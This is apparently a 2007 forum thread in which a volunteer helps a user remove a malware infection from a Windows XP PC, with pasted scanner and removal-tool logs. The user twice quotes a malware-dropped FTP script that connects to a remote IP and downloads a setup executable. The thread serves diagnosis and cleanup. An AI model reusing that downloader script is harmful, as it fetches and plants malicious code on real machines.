backup-20070221-190939-975 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070223-224512-185 O16 - DPF: {15589FA1-C456-11CE-BF01-000000000000} - http://www.errornuker.com/products/e...rInstaller.exe
backup-20070223-224512-192 O4 - Global Startup: .protected
backup-20070223-224512-482 O4 - HKLM\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070223-224512-515 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - (no file)
backup-20070223-224512-523 O4 - Startup: .protected
backup-20070223-224512-588 O4 - HKCU\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070223-224512-766 O4 - HKLM\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070223-224512-839 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\lpuotxaf.dll",setvm
backup-20070223-224512-855 O4 - HKCU\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070223-224856-783 O4 - Startup: .protected
backup-20070223-224856-791 O4 - Global Startup: .protected
backup-20070223-225649-352 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\arbcakff.dll",setvm
backup-20070223-230505-157 O4 - Global Startup: .protected
backup-20070223-230505-646 O4 - Startup: .protected
backup-20070223-230834-571 O4 - Startup: .protected
backup-20070223-230834-966 O4 - Global Startup: .protected
backup-20070224-121833-356 O4 - Startup: .protected
backup-20070224-121834-543 O4 - Global Startup: .protected
backup-20070228-200450-511 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\ebacdlso.dll",setvm
backup-20070301-200021-179 O2 - BHO: 0 - {A87A5C44-882B-42BC-27A5-06511D2BA675} - C:\Program Files\Common Files\sagu292.dll (file missing)
backup-20070301-200021-201 O2 - BHO: (no name) - {067BE456-B710-4015-84FF-E09B52ACE092} - C:\WINDOWS\System32\pmkjj.dll (file missing)
backup-20070301-200021-208 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\kxrwuojr.dll",setvm
backup-20070301-200021-574 O2 - BHO: (no name) - {C3581462-AD4C-43AF-A8A7-AFEFEBA11B44} - C:\WINDOWS\system32\byxwttt.dll
backup-20070301-200021-742 O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
backup-20070301-200021-877 O20 - Winlogon Notify: byxyvwv - byxyvwv.dll (file missing)
backup-20070301-200021-920 O2 - BHO: (no name) - {E03C740E-BB24-4d3c-B92A-6F84DE1DD99C} - C:\WINDOWS\System32\xbiehfer.dll (file missing)
backup-20070301-200021-993 O2 - BHO: (no name) - {37EB498E-7800-A96A-AED9-045FF6ECB283} - C:\WINDOWS\System32\ceamvdb.dll (file missing)
backup-20070301-200022-224 O20 - Winlogon Notify: szr_dll - C:\WINDOWS\szr_dll.dll
backup-20070308-230025-273 O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - (no file)
backup-20070308-230025-385 O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\
backup-20070308-230025-425 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\uejowmvf.dll",setvm
backup-20070308-230025-533 O2 - BHO: 0 - {A87A5C44-882B-42BC-27A5-06511D2BA675} - (no file)
backup-20070308-230025-624 O20 - Winlogon Notify: awvtq - C:\WINDOWS\System32\awvtq.dll (file missing)
backup-20070308-230025-627 O4 - HKLM\..\Run: [DSS] C:\WINDOWS\BBSTORE\DSS\DSSAGENT.EXE
backup-20070308-230025-753 O2 - BHO: (no name) - {37EB498E-7800-A96A-AED9-045FF6ECB283} - (no file)
backup-20070308-230025-774 O2 - BHO: (no name) - {067BE456-B710-4015-84FF-E09B52ACE092} - (no file)
backup-20070308-230025-928 O2 - BHO: (no name) - {DEB17D59-1D80-4627-AA07-E01BB37A8399} - C:\WINDOWS\System32\awvtq.dll (file missing)

-- File Associations -----------------------------------------------------------

All associations okay.

-- Drivers: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled ---------------------

R0 drvmcdb - c:\windows\system32\drivers\drvmcdb.sys
R0 Teefer (Teefer for NT) - c:\windows\system32\drivers\teefer.sys
R1 BANTExt (Belarc SMBios Access) - c:\windows\system32\drivers\bantext.sys
R1 wpsdrvnt - c:\windows\system32\drivers\wpsdrvnt.sys
R2 mdmxsdk - c:\windows\system32\drivers\mdmxsdk.sys
R2 wg6n (SyGate for NT, wg6n) - c:\windows\system32\drivers\wg6n.sys
R3 HSF_DP - c:\windows\system32\drivers\hsf_dp.sys
R3 HSFHWBS2 - c:\windows\system32\drivers\hsfhwbs2.sys
R3 ialm - c:\windows\system32\drivers\ialmnt5.sys
R3 pcouffin (VSO Software pcouffin) - c:\windows\system32\drivers\pcouffin.sys
R3 wanatw (WAN Miniport (ATW)) - c:\windows\system32\drivers\wanatw4.sys
R3 winachsf - c:\windows\system32\drivers\hsf_cnxt.sys

S2 Ca536av (DV 4100M(Video)) - c:\windows\system32\drivers\ca536av.sys
S2 ntio256 (Input and output operations) - c:\windows\system32\ntio256.sys (file missing)
S2 wg3n (SyGate for NT, wg3n) - c:\windows\system32\drivers\wg3n.sys
S2 wg4n (SyGate for NT, wg4n) - c:\windows\system32\drivers\wg4n.sys
S2 wg5n (SyGate for NT, wg5n) - c:\windows\system32\drivers\wg5n.sys
S3 USBCamera (DV 4100M(Still)) - c:\windows\system32\drivers\bulk536.sys

-- Services: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled --------------------

R2 uploadmgr (Upload Manager) - c:\windows\system32\svchost.exe -k netsvcs

-- Files created between 2007-02-21 and 2007-03-21 -----------------------------

2007-03-20 20:18:18 0 d-------- C:\avenger
2007-03-19 21:14:12 0 d--h----- C:\WINDOWS\PIF
2007-03-18 09:51:51 77 --a------ C:\delete.reg
2007-03-13 20:51:18 136 --a------ C:\WINDOWS\System32\dgjun.bat
2007-03-12 18:20:25 491768 --a------ C:\ie6setup.exe
2007-03-11 22:17:35 0 d-------- C:\WINDOWS\System32\ActiveScan<ACTIVE~1>
2007-03-11 09:25:11 0 d-------- C:\Program Files\Java
2007-03-11 09:25:11 0 d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24:21 0 d-------- C:\Documents and Settings\Duane\Application Data\Sun
2007-03-10 11:31:19 0 d-------- C:\Rustbfix
2007-03-08 19:33:08 49152 --a------ C:\Documents and Settings\Duane\vfind.exe
2007-03-08 19:33:08 79360 --a------ C:\Documents and Settings\Duane\swxcacls.exe
2007-03-08 19:33:08 123904 --a------ C:\Documents and Settings\Duane\swsc.exe
2007-03-08 19:33:08 140800 --a------ C:\Documents and Settings\Duane\swreg.exe
2007-03-08 19:33:08 8192 --a------ C:\Documents and Settings\Duane\RestartIt.exe<RESTAR~1.EXE>
2007-03-08 19:33:08 6914 --a------ C:\Documents and Settings\Duane\Qoo.bat
2007-03-08 19:33:08 971 --a------ C:\Documents and Settings\Duane\Purity.bat
2007-03-08 19:33:08 39184 --a------ C:\Documents and Settings\Duane\Ntrights.exe
2007-03-08 19:33:08 5074 --a------ C:\Documents and Settings\Duane\NTPBack.exe
2007-03-08 19:33:08 42887 --a------ C:\Documents and Settings\Duane\ntp.exe
2007-03-08 19:33:08 26112 --a------ C:\Documents and Settings\Duane\nircmd.exe
2007-03-08 19:33:08 38400 --a------ C:\Documents and Settings\Duane\moveex.exe
2007-03-08 19:33:08 2304 --a------ C:\Documents and Settings\Duane\Look2Me.bat
2007-03-08 19:33:08 117379 --a------ C:\Documents and Settings\Duane\LIST-C.bat
2007-03-08 19:33:08 181776 --a------ C:\Documents and Settings\Duane\handle.exe
2007-03-08 19:33:08 73728 --a------ C:\Documents and Settings\Duane\FDSV.EXE
2007-03-08 19:33:08 51200 --a------ C:\Documents and Settings\Duane\dumphive.exe
2007-03-08 19:33:08 319415 --a------ C:\Documents and Settings\Duane\Creg.reg
2007-03-08 19:33:08 28672 --a------ C:\Documents and Settings\Duane\catchme.exe
2007-02-24 21:33:14 53248 --a------ C:\WINDOWS\System32\Process.exe
2007-02-24 21:33:08 0 d-------- C:\SmitfraudFix<SMITFR~1>
2007-02-21 21:42:30 129 --a------ C:\fix.bat

-- Find3M Report ---------------------------------------------------------------

2007-03-21 21:15:45 0 d-------- C:\Program Files\Hijack This<HIJACK~1>
2007-03-21 20:38:09 0 d-------- C:\Program Files\Picasa2
2007-03-21 20:36:13 0 d-------- C:\Program Files\Messenger<MESSEN~1>
2007-03-21 20:31:05 0 d-------- C:\Program Files\iTunes
2007-03-21 20:29:54 0 d-------- C:\Program Files\Google
2007-03-21 20:27:24 0 d-------- C:\Program Files\BigFix
2007-03-08 19:47:09 0 d-------- C:\Program Files\Common Files\Symantec Shared<SYMANT~1>
2007-02-25 10:48:59 0 d---s---- C:\Documents and Settings\Duane\Application Data\Microsoft<MICROS~1>
2007-02-24 22:08:44 3762 --a------ C:\WINDOWS\System32\tmp.reg
2007-02-24 10:40:37 0 d-------- C:\Documents and Settings\Duane\Application Data\AVG7
2007-02-21 18:24:56 0 d-------- C:\Program Files\backups
2007-02-20 21:14:12 0 d-------- C:\Program Files\Shockwave.com<SHOCKW~1.COM>
2007-02-13 21:29:11 0 d-------- C:\Program Files\Common Files\Sandlot Shared<SANDLO~1>
2007-02-10 20:00:13 14201 --a------ C:\Program Files\hijackthis.log<HIJACK~1.LOG>
2007-01-28 22:13:42 0 d-------- C:\Program Files\LG Software Innovations<LGSOFT~1>
2007-01-28 22:05:20 0 d-------- C:\Program Files\CloneDVD
2007-01-28 21:28:17 14 --a------ C:\WINDOWS\System32\systeminfo3.dll<SYSTEM~1.DLL>
2007-01-28 21:26:56 0 d-------- C:\Documents and Settings\Duane\Application Data\Vso
2007-01-28 21:26:55 34 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.log
2007-01-28 21:26:41 47360 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.sys
2007-01-28 21:26:41 1144 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.inf
2007-01-28 21:26:41 7176 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.cat
2007-01-28 21:26:41 81920 --a------ C:\Documents and Settings\Duane\Application Data\ezpinst.exe
2007-01-28 10:10:09 0 --a------ C:\WINDOWS\System32\3D64363D
2007-01-27 17:25:38 0 --a------ C:\WINDOWS\System32\DF21552E
2007-01-24 18:26:41 32 --a------ C:\WINDOWS\System32\14981
2007-01-24 18:19:43 0 --a------ C:\WINDOWS\System32\7AAECFBC
2007-01-21 15:19:32 0 d-------- C:\Documents and Settings\Duane\Application Data\Lavasoft
2007-01-21 15:19:15 0 d-------- C:\Program Files\Lavasoft
2007-01-21 15:08:15 14612 --a------ C:\Program Files\CWSHREDDER.EXE-2D092FD4.pf<CWSHRE~1.PF>
2007-01-21 15:03:52 532480 --a------ C:\Program Files\cwshredder.exe<CWSHRE~1.EXE>
2007-01-13 14:32:20 0 --a------ C:\WINDOWS\System32\00BDDB65
2007-01-13 09:32:29 2 --a------ C:\337100427<337100~1>
2007-01-12 18:19:57 0 --a------ C:\WINDOWS\System32\vb2en16.dll
2007-01-12 18:19:50 1235 --a------ C:\WINDOWS\System32\openopenopen<OPENOP~2>
2007-01-12 18:19:49 6 --a------ C:\WINDOWS\System32\openopenopenopen<OPENOP~1>
2007-01-12 18:19:34 0 --a------ C:\WINDOWS\System32\99239519
2007-01-11 18:27:03 0 --a------ C:\WINDOWS\System32\9ACA5390
2007-01-11 18:27:03 0 --a------ C:\WINDOWS\System32\86C67981
2007-01-11 16:35:52 1 --a------ C:\WINDOWS\System32\kr_done1
2007-01-11 16:35:33 12800 --a------ C:\WINDOWS\System32\svchost.exe
2007-01-11 16:33:19 0 --a------ C:\WINDOWS\System32\3718845C
2007-01-08 16:00:23 0 --a------ C:\WINDOWS\System32\9947BC72
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\ps.dat
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\cookie.dat
2007-01-07 13:16:52 25600 --a------ C:\WINDOWS\System32\helper.dll
2007-01-05 10:40:00 0 --a------ C:\WINDOWS\System32\9147A101
2007-01-04 22:35:41 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49:11 5037072 --a------ C:\Program Files\spybotsd14.exe<SPYBOT~1.EXE>
2007-01-01 12:02:40 507 --a------ C:\WINDOWS\EReg077.dat
2006-12-25 16:33:11 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi<PLAINO~1.XPI>

-- Registry Dump ---------------------------------------------------------------

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0

-- End of Deckard's System Scanner: finished at 2007-03-21 at 21:16:10 ---------

Extra.txt is attached, had to reboot since dropdown froze up system. Things work great after reboot, but go downhill after running any of the fix programs.

Thanks

cul8rman · 03-22-2007, 12:00 AM

I looked in C/Windows/System32 for the Setup files and found one =-
Setup_02274.exe with a modified date of 3/21/07.

I also found a file that had been deleted - "I" and here is the contents

open 130.13.240.51 13194
user 1 1
get setup_02274.exe
quit

I also looked in openopenopen and openopenopenopen and it was a bunch of numbers and characters, but a lot of 3's and letters. I don't know if that is significant.

I have a bunch of files that are of type "File" in the system32 folder. I checked my other PC and that type of file does not exist there. I tried doing a screen shot and doing a word doc but the size was too big.

Just some things i see, if it helps.

Thanks

Ried · 03-22-2007, 08:26 AM

Good work.

I'd like to gather a bit more information.

Go to Start>Run and type cmd then press Enter

Type the following instruction at the command prompt:

dir /s /a "C:\WINDOWS\System32\openopenopenopen" > c:\find.txt & start notepad c:\find.txt

You may find it easier to copy/paste it into the command prompt. If you're unfamiliar with this, you can paste into the command prompt by clicking on the upper left icon on the command shell window, referred to as the system menu, and along with Move, Size, and so on, you'll see a sub menu called Edit. Click on that, and you'll find Copy, Paste and other clipboard related commands. Here's a screen shot of what I mean:

A notepad file will open. Paste the contents of that file here.

------------------------------------------------

Also, please navigate to the following and tell me what's in these:

C:\337100427
C:\WINDOWS\System32\14981
C:\WINDOWS\System32\3D64363D
C:\WINDOWS\System32\7AAECFBC
C:\WINDOWS\System32\86C67981
C:\WINDOWS\System32\9147A101
C:\WINDOWS\System32\9947BC72
C:\WINDOWS\System32\9ACA5390
C:\WINDOWS\System32\DF21552E

cul8rman · 03-22-2007, 11:23 AM

Would you like the entries posted in a reply or attached in a notepad txt file? Do you want them listed altogether like

Contents of
C:\337100427
blah, blah,

C:\WINDOWS\System32\14981
blah, blah,

etc...

Just a bit of background, I did start out in my younger days as a computer science major but did not like the direction that was going so I ended up getting an accounting degree. I am familar wiht the logic behind how the computer works, but not at all with how Windows works and all the relationships it builds in the DLL files. I checked the directory on my working PC and figured since that one is working fairly good if something is not in that it should not be in the one you are helping me with. My working PC is up to date with SP2 but is running slow. I will work on that one later, this one is enough work for now.

I should be able to get this done late tonight but I have to help my son with a school project and he got tickets to the hockey game so I will be getting home late. I will get back to you as soon as I get the file contents exported to the method you choose.

Thanks for the help, I better get back to my job or I will have plenty time to take care of the ailing PC.

Ried · 03-22-2007, 11:41 AM

Now I know why you're such a pleasure to work with on this.

However you see fit to provide the info is fine with me. Just do whatever is most convenient for you.

I too have a family to tend to and also have plans this evening and may not be able to go over the info until tomorrow. Take your time--enjoy your time with your son--school projects are always fun

cul8rman · 03-23-2007, 07:14 PM

Doing everything in Notepad, cntrl A, cntrl C, then cntrl V is easy enough. Each file is separated by *******************, comments ***( ) are mine, not what was in the file.
-----------------------------------

Contents of Find.txt

Volume in drive C has no label.
Volume Serial Number is 1417-BE8B

Directory of C:\WINDOWS\System32

01/12/2007 06:19 PM 6 openopenopenopen
1 File(s) 6 bytes

Total Files Listed:
1 File(s) 6 bytes
0 Dir(s) 74,311,806,976 bytes free

Now for the "File" contents

****************************************
C:\337100427

ok

****************************************
C:\WINDOWS\System32\14981

*** (Appears to be a bunch of spaces)
****************************************
C:\WINDOWS\System32\3D64363D

*** (empty)
****************************************
C:\WINDOWS\System32\7AAECFBC

*** (empty)
****************************************
C:\WINDOWS\System32\86C67981

*** (empty)
****************************************
C:\WINDOWS\System32\9147A101

*** (empty)
****************************************
C:\WINDOWS\System32\9947BC72

*** (empty)
****************************************
C:\WINDOWS\System32\9ACA5390

*** (empty)
****************************************
C:\WINDOWS\System32\DF21552E

*** (empty)

****************************************
End of file posts

They were all empty except the first one, that
had a bunch of spaces. They are all type "File"
and the last date modified was January 2007.

cul8rman · 03-23-2007, 07:19 PM

Will updating to SP2 help, or do I need to wait until this is resolved? I think the infection may have entered through another user on this, should I be working on that person's area or does the software look at the whole drive?

Thanks - BTW, system is running alright so far.

03-19-2007, 07:32 PM	#62 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Which one contained an IP address? It was in C:\WINDOWS\system32\i I tried searching for it and it is back. Here are the contents of "I" open 130.13.166.123 27067 user 1 1 get setup_01505.exe quit Maybe it is not an IP Address, but to me it looked like one. I am suprised that the file is back, I deleted it and did not find it yesterday.

03-19-2007, 08:04 PM	#63 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet Yes, that is an IP address--good eye. Have you followed my instructions just before I inquired about that file and IP address? __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-19-2007, 10:16 PM	#64 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Contents of Report.txt ********************* SDFix: Version 1.69 Run by Duane - Mon 03/19/2007 @ 20:36:04.07 Microsoft Windows XP [Version 5.1.2600] Running From: C:\Documents and Settings\Duane\Desktop\SDFix Safe Mode: Checking Services: Restoring Windows Registry Entries Restoring Default Hosts File Rebooting... Normal Mode: Checking Files: Below files will be copied to Backups folder then removed: C:\WINDOWS\system32\i - Deleted C:\WINDOWS\system32\setup_01505.exe - Deleted C:\WINDOWS\system32\setup_03755.exe - Deleted C:\WINDOWS\system32\setup_10548.exe - Deleted C:\WINDOWS\system32\setup_42102.exe - Deleted ADS Check: C:\WINDOWS\system32 No streams found. Final Check: Remaining Services: ------------------ Authorized Application Key Export: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe::enabled:@xpsp2res.dll,-22019" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe::enabled:@xpsp2res.dll,-22019" Remaining Files: --------------- Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip Checking For Files with Hidden Attributes : C:\Program Files\Common Files\aolshare\shell\us\shellext.dll C:\Program Files\Common Files\csshare\shell\us\shellext.dll C:\My Games\Action Ball\actionball.exe C:\My Games\Adventure Ball\AdventureBall.exe C:\My Games\Aqua Pearls\pearls.exe C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe C:\My Games\Clash 'N Slash\Clash N Slash.exe C:\My Games\Flying Leo\FlyingLeo.exe C:\My Games\Icy Spell\IcySpell.exe C:\My Games\Impact\Impact.exe C:\My Games\Inspheration\Inspheration.exe C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe C:\My Games\Mirror Magic\mirrormagic.exe C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe C:\My Games\Phlinx to Go\PhlinxToGo.exe C:\My Games\Rainbow Web\RainbowWeb.exe C:\My Games\Snowy - Space Trip\SpaceTrip.exe C:\My Games\Turtle Odyssey\Game.exe C:\My Games\Wheel of Fortune\Wheel of Fortune.exe C:\Program Files\America Online 8.0\aolphx.exe C:\Program Files\America Online 8.0\aoltray.exe C:\Program Files\America Online 8.0\RBM.exe C:\Program Files\America Online 8.0\waol.exe C:\Program Files\America Online 8.0\COMIT\cswitch.exe C:\Program Files\CompuServe 7.0\csphx.exe C:\Program Files\CompuServe 7.0\cstray.exe C:\Program Files\CompuServe 7.0\RBM.exe C:\Program Files\CompuServe 7.0\wcs2000.exe C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe C:\Program Files\Picasa2\setup.exe C:\WINDOWS\system32\config\system.tmp.LOG Add/Remove Programs List: 1Click DVD Copy 4.2.9.2 3D Snowy Cottage Screen Saver Ad-Aware SE Personal Adobe Acrobat 4.0 Agfa ePhoto CL18 Digital Camera Driver America Online AOL Instant Messenger (SM) AOL Coach Version 1.0(Build:20020823.1) AVG 7.5 AVG Anti-Spyware 7.5 BadCopy Pro Belarc Advisor 7.0 BigFix Calm Before the Storm Screen Saver Chess Live 4.2 Cinema Tycoon(TM) Gold CleanUp! Conexant SoftK56 Modem(M) CompuServe Codec Pack - All In 1 6.0.2.7 Cox Online Support Controls EPSON Printer Software EZBack-it-up 2.0.1 Fiber Twig 2: Restoration of Magic Garden Fish Tycoon Fortune Tiles(TM) Gold FREE Hi-Q Recorder 1.9 Gem Shop Google Desktop Search Gum Droppers Hexalot High Flying Act - Interactive Storybook HijackThis 1.99.1 ICQ iTunes Karu Microsoft Data Access Components KB870669 Lavasoft VX2 Cleaner LEGO Chess Macromedia Shockwave Player CloneDVD 4.0 Micro Innovations Wireless Keyboard Micro Innovations Wireless Optical Mouse Mozilla Firefox (2.0.0.2) MSN Music Assistant Netscape 6 (6.2.1) Panda ActiveScan PC Pitstop Optimize 1.5 Picasa 2 QuickTime Reader Rabbit 1st Grade Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM) Reader Rabbit Thinking Adventures Ages 4-6 Reader Rabbit(R) I Can Read! With Phonics RealArcade RealPlayer RegistryFix v3.0 Reader Rabbit's 2nd Grade Sandlot Games Client Services Macromedia Flash Player 8 SimCity 3000 Splash Spybot - Search & Destroy 1.4 IncBack + SurferNETWORK Player SyncBackSE Viewpoint Media Player (Remove Only) WeatherBug Winamp (remove only) Yahoo! Toolbar Yahoo! Toolbar Zulu Gems Microsoft Money 2003 Microsoft Money 2003 System Pack PC Inspector File Recovery The Sims Deluxe Edition Norton WMI Update Google Toolbar for Internet Explorer Java(TM) SE Runtime Environment 6 DataRobot Premium Stomp Backup MyPC MaxBlast 4 PowerDVD Windows Backup Utility EPSON Web-To-Page Mirror Magic NetZero For Riverdeep iTunes Intel(R) Extreme Graphics Driver Microsoft Office Excel Viewer 2003 Microsoft Office Word Viewer 2003 Adobe Reader 7.0.7 DV 4100M HP Software Update Ulead Photo Express 4.0 SE Texas Hold 'Em: High Stakes Poker Ulead Photo Explorer 8.0 SE Basic Disney's Phonics Quest Greeting Card Factory Express Sygate Personal Firewall Microsoft Works 6.0 HP Deskjet 3740 Realtek AC'97 Audio Multimedia Keyboard Driver Finished ******************* I found one, it is dated today and is named Setup_63032.exe File size 0 ********************** I will leave the system running ************************

03-19-2007, 10:31 PM	#65 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet Ok, while it's still up--run an new scan with ComboScan.exe (not combofix.exe) and post the log here. Do not reboot. __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-19-2007, 11:06 PM	#66 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet ComboScan v20070306.20 run by Duane on 2007-03-19 at 21:58:40 Computer is in Normal Mode. -------------------------------------------------------------------------------- -- HijackThis (run as Duane.exe) ----------------------------------------------- HijackThis failed to provide a log after three minutes; running clone instead. -- HijackThis Clone ------------------------------------------------------------ Emulating logfile of HijackThis v1.99.1 Scan saved at 2007-03-19 22:01:40 Platform: Windows XP Service Pack 1 (5.01.2600) MSIE: Internet Explorer (6.0.2800.1106) Running processes: C:\WINDOWS\system32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\WINDOWS\explorer.exe C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe C:\Program Files\Grisoft\AVG7\avgamsvr.exe C:\Program Files\Grisoft\AVG7\avgupsvc.exe C:\Program Files\Grisoft\AVG7\avgemc.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\wanmpsvc.exe C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\ftp.exe C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\monitor.exe C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb10.exe C:\Program Files\HP\hpcoretech\hpcmpmgr.exe C:\Program Files\Hewlett-Packard\HP Software Update\hpwuSchd2.exe C:\Program Files\Picasa2\PicasaMediaDetector.exe C:\Program Files\iTunes\iTunesHelper.exe C:\Program Files\Grisoft\AVG7\avgcc.exe C:\Program Files\Micro Innovations\Keyboard\KBDAP32A.EXE C:\Program Files\Micro Innovations\Mouse\mouse32a.exe C:\Program Files\iPod\bin\iPodService.exe C:\Program Files\Java\jre1.6.0\bin\jusched.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\BigFix\BigFix.exe C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe C:\Documents and Settings\Duane\Desktop\comboscan.exe C:\Program Files\Hijack This\Duane.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.emachines.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie R1 - HKLM\Software\Microsoft\Internet 